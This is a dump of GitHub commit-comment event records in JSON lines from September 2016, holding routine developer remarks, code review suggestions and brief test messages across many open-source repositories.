Adventure\r\n[10:32:08 AM]  Changing objective to: Gold Chamber\r\n[10:32:09 AM]  Changing objective to: Adventure\r\n[10:32:11 AM]  Changing objective to: Gold Chamber\r\n\r\n"}},"created_at":"2016-09-09T03:33:31Z"}
{"id":"4537959541","type":"CommitCommentEvent","actor":{"login":"Cellule"},"repo":{"name":"Cellule/ChakraCore"},"payload":{"comment":{"id":18957169,"position":4,"line":8,"path":"lib/Runtime/CMakeLists.txt","commit_id":"514e6154bfc925b393143424a2806215be8ea4f0","created_at":"2016-09-09T03:34:14Z","updated_at":"2016-09-09T03:34:14Z","body":"Good point, it is missing, I guess the compiler didn't complain because pretty much everything for WebAssembly is #ifdef out for linux."}},"created_at":"2016-09-09T03:34:14Z"}
{"id":"4537959578","type":"CommitCommentEvent","actor":{"login":"mckolu"},"repo":{"name":"mitchellirvin/dialoguesystems"},"payload":{"comment":{"id":18957170,"position":null,"line":null,"path":null,"commit_id":"bb22f2b03229c010a15addb751c45d84c7e5e65a","created_at":"2016-09-09T03:34:15Z","updated_at":"2016-09-09T03:34:15Z","body":"R file"}},"created_at":"2016-09-09T03:34:15Z"}
{"id":"4537959663","type":"CommitCommentEvent","actor":{"login":"aneesrana"},"repo":{"name":"aneesrana/anees-rana"},"payload":{"comment":{"id":18957171,"position":null,"line":null,"path":null,"commit_id":"d927fd561d17c1461e90fab9971b40e3545a0f2d","created_at":"2016-09-09T03:34:17Z","updated_at":"2016-09-09T03:34:17Z","body":"![screenshot 23](https://cloud.githubusercontent.com/assets/20018401/18374647/c0a012bc-761c-11e6-83b3-675e7a851a63.png)\r\n![screenshot 24](https://cloud.githubusercontent.com/assets/20018401/18374648/c0a38be0-761c-11e6-802d-855ed13e3e58.png)\r\n![screenshot 25](https://cloud.githubusercontent.com/assets/20018401/18374646/c0a00c04-761c-11e6-83ae-2be3a6c9270d.png)\r\n"}},"created_at":"2016-09-09T03:34:17Z"}
{"id":"4537961918","type":"CommitCommentEvent","actor":{"login":"TheAlphaNerd"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":18957175,"position":null,"line":null,"path":null,"commit_id":"7eb0e7a4791584ef2c06cf810fc058eee022d2f1","created_at":"2016-09-09T03:35:10Z","updated_at":"2016-09-09T03:35:10Z","body":"looks like the url here has .patch in it :S"}},"created_at":"2016-09-09T03:35:10Z"}
{"id":"4537962145","type":"CommitCommentEvent","actor":{"login":"ccshan"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18957177,"position":null,"line":null,"path":null,"commit_id":"813de8e15cd48f37f068ebc873789cf8634fb822","created_at":"2016-09-09T03:35:16Z","updated_at":"2016-09-09T03:35:16Z","body":"Feel free to put some userinfo warning for `applyintegrand` in `simplify_assuming`..."}},"created_at":"2016-09-09T03:35:16Z"}
{"id":"4537962582","type":"CommitCommentEvent","actor":{"login":"oedesty"},"repo":{"name":"adamisntdead/FreeCodeJava"},"payload":{"comment":{"id":18957180,"position":3,"line":3,"path":"src/basicAlgorithmChallenges/FindTheLongestWordInAString.java","commit_id":"f4381f8623d19bbc6f254a89e79998bf04c7ee11","created_at":"2016-09-09T03:35:27Z","updated_at":"2016-09-09T03:35:27Z","body":"Octovaedeanaedeanaeded"}},"created_at":"2016-09-09T03:35:27Z"}
{"id":"4537964600","type":"CommitCommentEvent","actor":{"login":"lazedo"},"repo":{"name":"for-GET/jesse"},"payload":{"comment":{"id":18957182,"position":8,"line":214,"path":"src/jesse_validator_draft3.erl","commit_id":"a1ab58c42b98152d7b61730d0a456c1bb5c1a29a","created_at":"2016-09-09T03:36:15Z","updated_at":"2016-09-09T03:36:15Z","body":"@andreineculau isn't the order changed ? resolve_ref validates after resolving, returning in State a new schema, and you're passing this to validate the other Attrs. i think this should be\r\n```\r\nNewState = resolve_ref(Value, RefSchemaURI, State),\r\ncheck_value(Value, Attrs, undo_resolve_ref(NewState, State));\r\n```\r\n\r\nthoughts ?"}},"created_at":"2016-09-09T03:36:15Z"}
{"id":"4537966088","type":"CommitCommentEvent","actor":{"login":"emmabryce"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":18957189,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-09T03:36:50Z","updated_at":"2016-09-09T03:36:50Z","body":"Tumblir die"}},"created_at":"2016-09-09T03:36:50Z"}
{"id":"4537967406","type":"CommitCommentEvent","actor":{"login":"ThreeBearsDan"},"repo":{"name":"ThreeBearsDan/MeiQNetCheck"},"payload":{"comment":{"id":18957199,"position":13,"line":8,"path":"README.md","commit_id":"e8bffb44dcb7875343fee00ae6b03ff708cb8caa","created_at":"2016-09-09T03:37:24Z","updated_at":"2016-09-09T03:37:24Z","body":"Oh， No， 又是笔误。。"}},"created_at":"2016-09-09T03:37:24Z"}
{"id":"4537971721","type":"CommitCommentEvent","actor":{"login":"menicosia"},"repo":{"name":"cloudfoundry/cf-mysql-release"},"payload":{"comment":{"id":18957216,"position":null,"line":null,"path":null,"commit_id":"6abffec0646689af996072a3215a1220dfbdb3b9","created_at":"2016-09-09T03:39:07Z","updated_at":"2016-09-09T03:39:07Z","body":"Hey, this commit references story #129740061, which is for v24, but I think it was actually supposed to reference #129740059, which is the one for v26?"}},"created_at":"2016-09-09T03:39:07Z"}
{"id":"4537973998","type":"CommitCommentEvent","actor":{"login":"ferhung-mtk"},"repo":{"name":"ferhung-mtk/android_system_sepolicy"},"payload":{"comment":{"id":18957225,"position":null,"line":null,"path":null,"commit_id":"7f04f14ea5ec8daace2ac9c405e8b3bd5a23b3ca","created_at":"2016-09-09T03:40:04Z","updated_at":"2016-09-09T03:40:04Z","body":"Yes!"}},"created_at":"2016-09-09T03:40:04Z"}
{"id":"4537975184","type":"CommitCommentEvent","actor":{"login":"charlierproctor"},"repo":{"name":"snlab/IntegrationVM"},"payload":{"comment":{"id":18957236,"position":12,"line":13,"path":"Vagrantfile","commit_id":"26e62a5ac55d6cc04d3dc5a8fff7a4d5161bfc29","created_at":"2016-09-09T03:40:29Z","updated_at":"2016-09-09T03:40:29Z","body":"Awesome. Are there other ports in use as well...?"}},"created_at":"2016-09-09T03:40:29Z"}
{"id":"4537975843","type":"CommitCommentEvent","actor":{"login":"holysoros"},"repo":{"name":"julewu/spree_related_products"},"payload":{"comment":{"id":18957240,"position":6,"line":12,"path":"app/controllers/spree/admin/relations_controller.rb","commit_id":"f5ff6b3da6917ff9cd019318ab7230bd28ec66a7","created_at":"2016-09-09T03:40:45Z","updated_at":"2016-09-09T03:40:45Z","body":"move_to_bottom"}},"created_at":"2016-09-09T03:40:45Z"}
{"id":"4537981167","type":"CommitCommentEvent","actor":{"login":"uxtuo"},"repo":{"name":"uxtuo/Spoon-Knife"},"payload":{"comment":{"id":18957308,"position":4,"line":9,"path":"README.md","commit_id":"d0dd1f61b33d64e29d8bc1372a94ef6a2fee76a9","created_at":"2016-09-09T03:42:51Z","updated_at":"2016-09-09T03:42:51Z","body":"is this work？"}},"created_at":"2016-09-09T03:42:51Z"}
{"id":"4537983915","type":"CommitCommentEvent","actor":{"login":"binky123"},"repo":{"name":"binky123/Stockfish"},"payload":{"comment":{"id":18957339,"position":null,"line":null,"path":null,"commit_id":"702e898b14dbf8d84bb4b5fb2ec1b7a8b02ca755","created_at":"2016-09-09T03:44:01Z","updated_at":"2016-09-09T03:44:01Z","body":"Thank you. This test can run anway since my other idea was to reduce all captures at low depth."}},"created_at":"2016-09-09T03:44:01Z"}
{"id":"4537984481","type":"CommitCommentEvent","actor":{"login":"uxtuo"},"repo":{"name":"uxtuo/Spoon-Knife"},"payload":{"comment":{"id":18957351,"position":4,"line":9,"path":"README.md","commit_id":"d0dd1f61b33d64e29d8bc1372a94ef6a2fee76a9","created_at":"2016-09-09T03:44:16Z","updated_at":"2016-09-09T03:44:16Z","body":"哈哈哈"}},"created_at":"2016-09-09T03:44:16Z"}
{"id":"4537984591","type":"CommitCommentEvent","actor":{"login":"charlierproctor"},"repo":{"name":"snlab/IntegrationVM"},"payload":{"comment":{"id":18957353,"position":null,"line":null,"path":null,"commit_id":"f0e2e65444c4fd10cdc4c1554165d6869561b4da","created_at":"2016-09-09T03:44:19Z","updated_at":"2016-09-09T03:44:19Z","body":"Ok interesting! If that is the case, how will the VMs talk to each other ?? We might need to open some ports... \r\nAnd any ideas what kind of errors we would see (out of curiosity)? "}},"created_at":"2016-09-09T03:44:19Z"}
{"id":"4537985011","type":"CommitCommentEvent","actor":{"login":"uxtuo"},"repo":{"name":"uxtuo/Spoon-Knife"},"payload":{"comment":{"id":18957357,"position":null,"line":null,"path":null,"commit_id":"d0dd1f61b33d64e29d8bc1372a94ef6a2fee76a9","created_at":"2016-09-09T03:44:30Z","updated_at":"2016-09-09T03:44:30Z","body":"挺好"}},"created_at":"2016-09-09T03:44:30Z"}
{"id":"4537985247","type":"CommitCommentEvent","actor":{"login":"codnee"},"repo":{"name":"noliar/ASP.NET-Core-Sample"},"payload":{"comment":{"id":18957358,"position":null,"line":null,"path":null,"commit_id":"1923fa7448814b16657921232e7217a6eb564899","created_at":"2016-09-09T03:44:36Z","updated_at":"2016-09-09T03:44:36Z","body":"Hola"}},"created_at":"2016-09-09T03:44:36Z"}
{"id":"4537985880","type":"CommitCommentEvent","actor":{"login":"huhuanming"},"repo":{"name":"ThreeBearsDan/MeiQNetCheck"},"payload":{"comment":{"id":18957362,"position":13,"line":8,"path":"README.md","commit_id":"e8bffb44dcb7875343fee00ae6b03ff708cb8caa","created_at":"2016-09-09T03:44:52Z","updated_at":"2016-09-09T03:44:52Z","body":"😁"}},"created_at":"2016-09-09T03:44:52Z"}
{"id":"4537986318","type":"CommitCommentEvent","actor":{"login":"charlierproctor"},"repo":{"name":"snlab/IntegrationVM"},"payload":{"comment":{"id":18957364,"position":44,"line":44,"path":"bootstrap.sh","commit_id":"f0e2e65444c4fd10cdc4c1554165d6869561b4da","created_at":"2016-09-09T03:45:04Z","updated_at":"2016-09-09T03:45:04Z","body":"Hahaha no problem. It's never a good time to write bash..."}},"created_at":"2016-09-09T03:45:04Z"}
{"id":"4537987065","type":"CommitCommentEvent","actor":{"login":"zxz054321"},"repo":{"name":"air-fix/backend"},"payload":{"comment":{"id":18957368,"position":5,"line":24,"path":"app/Http/routes.php","commit_id":"9203579f2d5c0ce654c35655f9c23226674174e9","created_at":"2016-09-09T03:45:24Z","updated_at":"2016-09-09T03:45:24Z","body":"测试用例不是这么加的，这段及相关代码去掉"}},"created_at":"2016-09-09T03:45:24Z"}
{"id":"4537988269","type":"CommitCommentEvent","actor":{"login":"Rylock"},"repo":{"name":"EMFTeam/EMF"},"payload":{"comment":{"id":18957371,"position":null,"line":null,"path":null,"commit_id":"6ccefe6fc57905a437a853d89716b14ed79946b7","created_at":"2016-09-09T03:45:55Z","updated_at":"2016-09-09T03:45:55Z","body":"oops!"}},"created_at":"2016-09-09T03:45:55Z"}
{"id":"4537989051","type":"CommitCommentEvent","actor":{"login":"ashcoding"},"repo":{"name":"appcelerator/titanium_mobile"},"payload":{"comment":{"id":18957373,"position":null,"line":null,"path":null,"commit_id":"5688c392b127da39e6406898100124fe8bd46bc9","created_at":"2016-09-09T03:46:15Z","updated_at":"2016-09-09T03:46:15Z","body":"Looks pretty good. Could you provide code to test these out? \r\nA test for analytics (or maybe we can do that in a separate PR/Jira/Commit) to ensure no regressions. Another test for Intents.\r\n"}},"created_at":"2016-09-09T03:46:15Z"}
{"id":"4537989566","type":"CommitCommentEvent","actor":{"login":"charlierproctor"},"repo":{"name":"snlab/IntegrationVM"},"payload":{"comment":{"id":18957374,"position":null,"line":null,"path":null,"commit_id":"26e62a5ac55d6cc04d3dc5a8fff7a4d5161bfc29","created_at":"2016-09-09T03:46:27Z","updated_at":"2016-09-09T03:46:27Z","body":"Changes look good to me.. In the process of booting the VM and will post results when complete."}},"created_at":"2016-09-09T03:46:27Z"}
{"id":"4537990035","type":"CommitCommentEvent","actor":{"login":"ShawnLinLoveLife"},"repo":{"name":"snlab/IntegrationVM"},"payload":{"comment":{"id":18957375,"position":12,"line":13,"path":"Vagrantfile","commit_id":"26e62a5ac55d6cc04d3dc5a8fff7a4d5161bfc29","created_at":"2016-09-09T03:46:40Z","updated_at":"2016-09-09T03:46:40Z","body":"Currently no. But perhaps when we integrate IDE and Maple, there will be other ports in the future. "}},"created_at":"2016-09-09T03:46:40Z"}
{"id":"4537991857","type":"CommitCommentEvent","actor":{"login":"zxz054321"},"repo":{"name":"air-fix/backend"},"payload":{"comment":{"id":18957378,"position":8,"line":13,"path":"app/Http/Controllers/OrderController.php","commit_id":"9203579f2d5c0ce654c35655f9c23226674174e9","created_at":"2016-09-09T03:47:28Z","updated_at":"2016-09-09T03:47:28Z","body":"$message只在单个方法中使用了，没必要弄成类成员变量"}},"created_at":"2016-09-09T03:47:28Z"}
{"id":"4537995325","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":18957385,"position":null,"line":null,"path":null,"commit_id":"7aa75c9ef9a2665d3e8d48daf0680c3688220948","created_at":"2016-09-09T03:48:58Z","updated_at":"2016-09-09T03:48:58Z","body":"Why don't you wait for the results for take 1?\r\nThe framework is overloaded as is..."}},"created_at":"2016-09-09T03:48:58Z"}
{"id":"4537996659","type":"CommitCommentEvent","actor":{"login":"ccshan"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18957387,"position":null,"line":null,"path":null,"commit_id":"8b5a8f9bd5b4ad49e69a5c4f0c04a4c48f3b1feb","created_at":"2016-09-09T03:49:32Z","updated_at":"2016-09-09T03:49:32Z","body":"Oh that's how you do it! https://github.com/hakaru-dev/hakaru/commit/efd5f7a2a446531cf91daad50bbcad9df09900e7"}},"created_at":"2016-09-09T03:49:32Z"}
{"id":"4537997182","type":"CommitCommentEvent","actor":{"login":"charlierproctor"},"repo":{"name":"snlab/IntegrationVM"},"payload":{"comment":{"id":18957389,"position":null,"line":null,"path":null,"commit_id":"26e62a5ac55d6cc04d3dc5a8fff7a4d5161bfc29","created_at":"2016-09-09T03:49:46Z","updated_at":"2016-09-09T03:49:46Z","body":"One comment: can you print \"FASTMaple VM booted successfully!\" or something like that at the end, so the user knows the script completed successfully.."}},"created_at":"2016-09-09T03:49:46Z"}
{"id":"4537998043","type":"CommitCommentEvent","actor":{"login":"zxz054321"},"repo":{"name":"air-fix/backend"},"payload":{"comment":{"id":18957390,"position":16,"line":22,"path":"app/Repositories/OrderRepository.php","commit_id":"9203579f2d5c0ce654c35655f9c23226674174e9","created_at":"2016-09-09T03:50:12Z","updated_at":"2016-09-09T03:50:12Z","body":"这种情况改成 `$result ? 1 : 0;` 更优雅"}},"created_at":"2016-09-09T03:50:12Z"}
{"id":"4537999643","type":"CommitCommentEvent","actor":{"login":"zxz054321"},"repo":{"name":"air-fix/backend"},"payload":{"comment":{"id":18957395,"position":4,"line":5,"path":"app/Order.php","commit_id":"9203579f2d5c0ce654c35655f9c23226674174e9","created_at":"2016-09-09T03:50:51Z","updated_at":"2016-09-09T03:50:51Z","body":"Model中不应对Repository存在依赖"}},"created_at":"2016-09-09T03:50:51Z"}
{"id":"4538001332","type":"CommitCommentEvent","actor":{"login":"kxinds"},"repo":{"name":"kxinds/FirstBlog"},"payload":{"comment":{"id":18957397,"position":null,"line":null,"path":null,"commit_id":"02e9de481cc10c168ab61e9672b3ea0298969952","created_at":"2016-09-09T03:51:37Z","updated_at":"2016-09-09T03:51:37Z","body":"* 最开始用来稍加练习的"}},"created_at":"2016-09-09T03:51:37Z"}
{"id":"4538001444","type":"CommitCommentEvent","actor":{"login":"zxz054321"},"repo":{"name":"air-fix/backend"},"payload":{"comment":{"id":18957399,"position":1,"line":1,"path":"resources/views/demo.blade.php","commit_id":"9203579f2d5c0ce654c35655f9c23226674174e9","created_at":"2016-09-09T03:51:40Z","updated_at":"2016-09-09T03:51:40Z","body":"这个不是计数器项目啊，是不是走错片场了？"}},"created_at":"2016-09-09T03:51:40Z"}
{"id":"4538001483","type":"CommitCommentEvent","actor":{"login":"ShawnLinLoveLife"},"repo":{"name":"snlab/IntegrationVM"},"payload":{"comment":{"id":18957400,"position":null,"line":null,"path":null,"commit_id":"26e62a5ac55d6cc04d3dc5a8fff7a4d5161bfc29","created_at":"2016-09-09T03:51:41Z","updated_at":"2016-09-09T03:51:41Z","body":"Sure"}},"created_at":"2016-09-09T03:51:41Z"}
{"id":"4538001615","type":"CommitCommentEvent","actor":{"login":"zxz054321"},"repo":{"name":"air-fix/backend"},"payload":{"comment":{"id":18957401,"position":1,"line":1,"path":"resources/views/test.blade.php","commit_id":"9203579f2d5c0ce654c35655f9c23226674174e9","created_at":"2016-09-09T03:51:45Z","updated_at":"2016-09-09T03:51:45Z","body":"这个不是计数器项目啊，是不是走错片场了？"}},"created_at":"2016-09-09T03:51:45Z"}
{"id":"4538011307","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18957425,"position":null,"line":null,"path":null,"commit_id":"e6848f3e3d7c707a78731cb1ae6d1f37a7204803","created_at":"2016-09-09T03:56:05Z","updated_at":"2016-09-09T03:56:05Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-09T03:56:05Z"}
{"id":"4538012445","type":"CommitCommentEvent","actor":{"login":"a240277805"},"repo":{"name":"a240277805/node.js-async"},"payload":{"comment":{"id":18957430,"position":null,"line":null,"path":null,"commit_id":"24adbe68761b3fec0b18687787777d168801083a","created_at":"2016-09-09T03:56:33Z","updated_at":"2016-09-09T03:56:33Z","body":"OK"}},"created_at":"2016-09-09T03:56:33Z"}
{"id":"4538015850","type":"CommitCommentEvent","actor":{"login":"zenithtekla"},"repo":{"name":"zenithtekla/socially"},"payload":{"comment":{"id":18957439,"position":null,"line":null,"path":null,"commit_id":"ade4bac7570c565ceafdd33b1425faf927e2d1c4","created_at":"2016-09-09T03:57:57Z","updated_at":"2016-09-09T03:57:57Z","body":"3 ways data binding."}},"created_at":"2016-09-09T03:57:57Z"}
{"id":"4538018813","type":"CommitCommentEvent","actor":{"login":"a240277805"},"repo":{"name":"a240277805/node.js-async"},"payload":{"comment":{"id":18957441,"position":null,"line":null,"path":null,"commit_id":"24adbe68761b3fec0b18687787777d168801083a","created_at":"2016-09-09T03:59:11Z","updated_at":"2016-09-09T03:59:11Z","body":"返回"}},"created_at":"2016-09-09T03:59:11Z"}
{"id":"4538022692","type":"CommitCommentEvent","actor":{"login":"KevinHenriquez"},"repo":{"name":"RHSPreSeason/16-17"},"payload":{"comment":{"id":18957447,"position":null,"line":null,"path":null,"commit_id":"6e8d128e5e68ce6cb829127749c59f9d33edf5d6","created_at":"2016-09-09T04:00:43Z","updated_at":"2016-09-09T04:00:43Z","body":"![2f407228bb1cb7a5d21bd60408602112](https://cloud.githubusercontent.com/assets/16711716/18375057/7000136c-7620-11e6-83fc-ea496cc3f698.png)\r\n"}},"created_at":"2016-09-09T04:00:43Z"}
{"id":"4538031209","type":"CommitCommentEvent","actor":{"login":"springmeyer"},"repo":{"name":"mapbox/windows-builds"},"payload":{"comment":{"id":18957469,"position":31,"line":77,"path":"scripts/build_harfbuzz.bat","commit_id":"477c675c36a790711080e18ba66947feaed8c039","created_at":"2016-09-09T04:03:58Z","updated_at":"2016-09-09T04:03:58Z","body":"@BergWerkGIS Built in UCDN should be on. Otherwise another unicode implementation, like from ICU will be needed. The one from UCDN is ideal since it is small and that is what is used on unix (because we disable ICU: https://github.com/mapnik/mapnik-packaging/blob/7862fb9f58062780de1181a89a009c9d417037d1/osx/scripts/build_harfbuzz.sh#L46)"}},"created_at":"2016-09-09T04:03:58Z"}
{"id":"4538034040","type":"CommitCommentEvent","actor":{"login":"wangchong386"},"repo":{"name":"wangchong386/workspace"},"payload":{"comment":{"id":18957486,"position":null,"line":null,"path":null,"commit_id":"becf5121c56992c7d4dde2d6ef74a13ac5497576","created_at":"2016-09-09T04:05:13Z","updated_at":"2016-09-09T04:05:13Z","body":"测试成功"}},"created_at":"2016-09-09T04:05:13Z"}
{"id":"4538036862","type":"CommitCommentEvent","actor":{"login":"Pooja-hj"},"repo":{"name":"Pooja-hj/redme-edits"},"payload":{"comment":{"id":18957497,"position":1,"line":1,"path":".gitignore","commit_id":"7f49973f463882de015f55019bd747ec8f38d9c3","created_at":"2016-09-09T04:06:27Z","updated_at":"2016-09-09T04:06:27Z","body":"#include<iostream.h>"}},"created_at":"2016-09-09T04:06:27Z"}
{"id":"4538040359","type":"CommitCommentEvent","actor":{"login":"ashcoding"},"repo":{"name":"appcelerator/titanium_mobile"},"payload":{"comment":{"id":18957507,"position":null,"line":null,"path":null,"commit_id":"5688c392b127da39e6406898100124fe8bd46bc9","created_at":"2016-09-09T04:07:59Z","updated_at":"2016-09-09T04:07:59Z","body":"With this, every time TiLaunchActivity is started, it runs ```app.js`` if  the JSActivity is not running. Do you foresee any issues that may arise from that?"}},"created_at":"2016-09-09T04:07:59Z"}
{"id":"4538040784","type":"CommitCommentEvent","actor":{"login":"CovertJaguar"},"repo":{"name":"CovertJaguar/Railcraft"},"payload":{"comment":{"id":18957508,"position":5,"line":44,"path":"README.md","commit_id":"8d1ecd7e44bda790c4b38b5a1002957f9c25472f","created_at":"2016-09-09T04:08:12Z","updated_at":"2016-09-09T04:08:12Z","body":"Pretty much."}},"created_at":"2016-09-09T04:08:12Z"}
{"id":"4538040996","type":"CommitCommentEvent","actor":{"login":"jcameron"},"repo":{"name":"webmin/webmin"},"payload":{"comment":{"id":18957509,"position":null,"line":null,"path":null,"commit_id":"22c8d8d0417f4a11d41b5d430b5e1769518e0f52","created_at":"2016-09-09T04:08:18Z","updated_at":"2016-09-09T04:08:18Z","body":"Did you also apply this patch on your system : https://github.com/webmin/webmin/commit/74efe3465e82d8d428fa9eab8542e98425f68f88\r\n"}},"created_at":"2016-09-09T04:08:18Z"}
{"id":"4538041287","type":"CommitCommentEvent","actor":{"login":"jonschlinkert"},"repo":{"name":"jonschlinkert/snapdragon"},"payload":{"comment":{"id":18957511,"position":null,"line":null,"path":null,"commit_id":"a1c72232e18d9d200ede6f01bc6efe0756e57458","created_at":"2016-09-09T04:08:26Z","updated_at":"2016-09-09T04:08:26Z","body":"Damn, I meant to add that. Yeah, `.use` will be used for plugins. It was redundant with `.set` and was confusing. thanks"}},"created_at":"2016-09-09T04:08:26Z"}
{"id":"4538047538","type":"CommitCommentEvent","actor":{"login":"tunnckoCore"},"repo":{"name":"jonschlinkert/snapdragon"},"payload":{"comment":{"id":18957521,"position":null,"line":null,"path":null,"commit_id":"a1c72232e18d9d200ede6f01bc6efe0756e57458","created_at":"2016-09-09T04:11:09Z","updated_at":"2016-09-09T04:11:09Z","body":"Nope, I mean you can remove it because you added `base`."}},"created_at":"2016-09-09T04:11:09Z"}
{"id":"4538047811","type":"CommitCommentEvent","actor":{"login":"GoogleFrog"},"repo":{"name":"ZeroK-RTS/Zero-K"},"payload":{"comment":{"id":18957522,"position":null,"line":null,"path":null,"commit_id":"07cdcd2abbb66ec78a6be78cce1f5ebc730af46d","created_at":"2016-09-09T04:11:16Z","updated_at":"2016-09-09T04:11:16Z","body":"These may be better than the English versions. I looked it up and размножение = reproduction."}},"created_at":"2016-09-09T04:11:16Z"}
{"id":"4538051861","type":"CommitCommentEvent","actor":{"login":"Indimeco"},"repo":{"name":"Indimeco/QRPG"},"payload":{"comment":{"id":18957534,"position":null,"line":null,"path":null,"commit_id":"5174873926e3ee2b2674c90c82d70636f53e9594","created_at":"2016-09-09T04:13:05Z","updated_at":"2016-09-09T04:13:05Z","body":"Close #14 "}},"created_at":"2016-09-09T04:13:05Z"}
{"id":"4538053578","type":"CommitCommentEvent","actor":{"login":"abhikeshav"},"repo":{"name":"111pontes/ydk-gen"},"payload":{"comment":{"id":18957539,"position":5,"line":29,"path":"sdk/python/README.rst","commit_id":"26b9f75299e53f0dcf80fd883379145f0466c278","created_at":"2016-09-09T04:13:50Z","updated_at":"2016-09-09T04:13:50Z","body":"> To install support in your system\r\n\r\nShould it be 'To install this in your system'?"}},"created_at":"2016-09-09T04:13:50Z"}
{"id":"4538055434","type":"CommitCommentEvent","actor":{"login":"abhikeshav"},"repo":{"name":"111pontes/ydk-gen"},"payload":{"comment":{"id":18957543,"position":65,"line":49,"path":"sdk/python/README.rst","commit_id":"e5328ffabd434da062ffa380e15871010eca64d9","created_at":"2016-09-09T04:14:43Z","updated_at":"2016-09-09T04:14:43Z","body":"> Once you installed\r\n\r\nShould it be 'Once you have installed'?"}},"created_at":"2016-09-09T04:14:43Z"}
{"id":"4538056208","type":"CommitCommentEvent","actor":{"login":"clevalndcollins"},"repo":{"name":"clevalndcollins/supreme-waffle"},"payload":{"comment":{"id":18957545,"position":1,"line":1,"path":"Cleaveland Collins","commit_id":"718bd6daa1966fd5cacbb8b195f907831b26fb06","created_at":"2016-09-09T04:15:05Z","updated_at":"2016-09-09T04:15:05Z","body":"# Great services "}},"created_at":"2016-09-09T04:15:05Z"}
{"id":"4538057333","type":"CommitCommentEvent","actor":{"login":"jonschlinkert"},"repo":{"name":"jonschlinkert/snapdragon"},"payload":{"comment":{"id":18957548,"position":null,"line":null,"path":null,"commit_id":"a1c72232e18d9d200ede6f01bc6efe0756e57458","created_at":"2016-09-09T04:15:33Z","updated_at":"2016-09-09T04:15:33Z","body":"> Nope, I mean you can remove it because you added base.\r\n\r\nOh, the `Snapdragon` class... got it. The `.use` method was changed on `Parser` too. \r\n\r\n> And here comes one idea. Why not try to get the name of the plugin function?\r\n\r\nThat would be a bug waiting to happen lol"}},"created_at":"2016-09-09T04:15:33Z"}
{"id":"4538070727","type":"CommitCommentEvent","actor":{"login":"TheAlphaNerd"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":18957584,"position":null,"line":null,"path":null,"commit_id":"31653a5006165e86249fa6c3215e34c4ed8b3693","created_at":"2016-09-09T04:21:35Z","updated_at":"2016-09-09T04:21:35Z","body":"semi colon instead of colon here"}},"created_at":"2016-09-09T04:21:35Z"}
{"id":"4538075411","type":"CommitCommentEvent","actor":{"login":"adinike1"},"repo":{"name":"adinike1/Hello-World"},"payload":{"comment":{"id":18957598,"position":3,"line":3,"path":"README.md","commit_id":"b73b9fc4d74c87198f110b53c009f0bde32d84b3","created_at":"2016-09-09T04:23:49Z","updated_at":"2016-09-09T04:23:49Z","body":"commont: 这里新添加了一句话"}},"created_at":"2016-09-09T04:23:49Z"}
{"id":"4538089941","type":"CommitCommentEvent","actor":{"login":"Nimeesh"},"repo":{"name":"Nimeesh/Test"},"payload":{"comment":{"id":18957613,"position":null,"line":null,"path":null,"commit_id":"5bcdaeaa7952bb4669963e32b0980cbc0783492e","created_at":"2016-09-09T04:30:31Z","updated_at":"2016-09-09T04:30:31Z","body":"test comment `1 on \"dummy update\""}},"created_at":"2016-09-09T04:30:31Z"}
{"id":"4538090987","type":"CommitCommentEvent","actor":{"login":"mr-robot9"},"repo":{"name":"mr-robot9/AUStudentEmpSignIn"},"payload":{"comment":{"id":18957616,"position":null,"line":null,"path":null,"commit_id":"ed84a86399a9701613b6b9b0826d6e8127077448","created_at":"2016-09-09T04:31:02Z","updated_at":"2016-09-09T04:31:02Z","body":"Sample Pics"}},"created_at":"2016-09-09T04:31:02Z"}
{"id":"4538092108","type":"CommitCommentEvent","actor":{"login":"luveti"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18957619,"position":null,"line":null,"path":null,"commit_id":"02c6d6f0c7aaecdeabf43c80c96065b5fa8f2e82","created_at":"2016-09-09T04:31:32Z","updated_at":"2016-09-09T04:31:32Z","body":"'main.scss' isn't needed with the component based system we're using here, the only thing that would probably go into it is the 'html' and 'body' styles, and would probably just complicate the build process. 'Root' styles (like stuff for the body), should probably go into the <style> section of App.vue, as it's the 'root' component"}},"created_at":"2016-09-09T04:31:32Z"}
{"id":"4538097202","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"mareyc/homework-city"},"payload":{"comment":{"id":18957636,"position":53,"line":53,"path":"js/script.js","commit_id":"874bd3854caeae9cc9e55fb7b73b18b5d1f524e7","created_at":"2016-09-09T04:33:52Z","updated_at":"2016-09-09T04:33:52Z","body":"Great job leaving comments and pseudocoding! It is very clear what you are thinking and how you are approaching the code."}},"created_at":"2016-09-09T04:33:52Z"}
{"id":"4538098239","type":"CommitCommentEvent","actor":{"login":"boswelja"},"repo":{"name":"boswelja/AndroidN-ify"},"payload":{"comment":{"id":18957640,"position":null,"line":null,"path":null,"commit_id":"74b2a16ac6ef8bc0a3b77764d0f53198f89a7802","created_at":"2016-09-09T04:34:21Z","updated_at":"2016-09-09T04:34:21Z","body":"When running Android Studios 'Inspect Code' function, we get many issues. This fixes some of them"}},"created_at":"2016-09-09T04:34:21Z"}
{"id":"4538098400","type":"CommitCommentEvent","actor":{"login":"manbradcalf"},"repo":{"name":"manbradcalf/Udactiy_Popular_Movies"},"payload":{"comment":{"id":18957642,"position":null,"line":null,"path":null,"commit_id":"0f795f91cc08c7fc4be9b6d6b32a15c1c728bd87","created_at":"2016-09-09T04:34:25Z","updated_at":"2016-09-09T04:34:25Z","body":"I will add that I need to clean up the logic/syntax in detail fragment to fix the bugs i fixed in the detail activity"}},"created_at":"2016-09-09T04:34:25Z"}
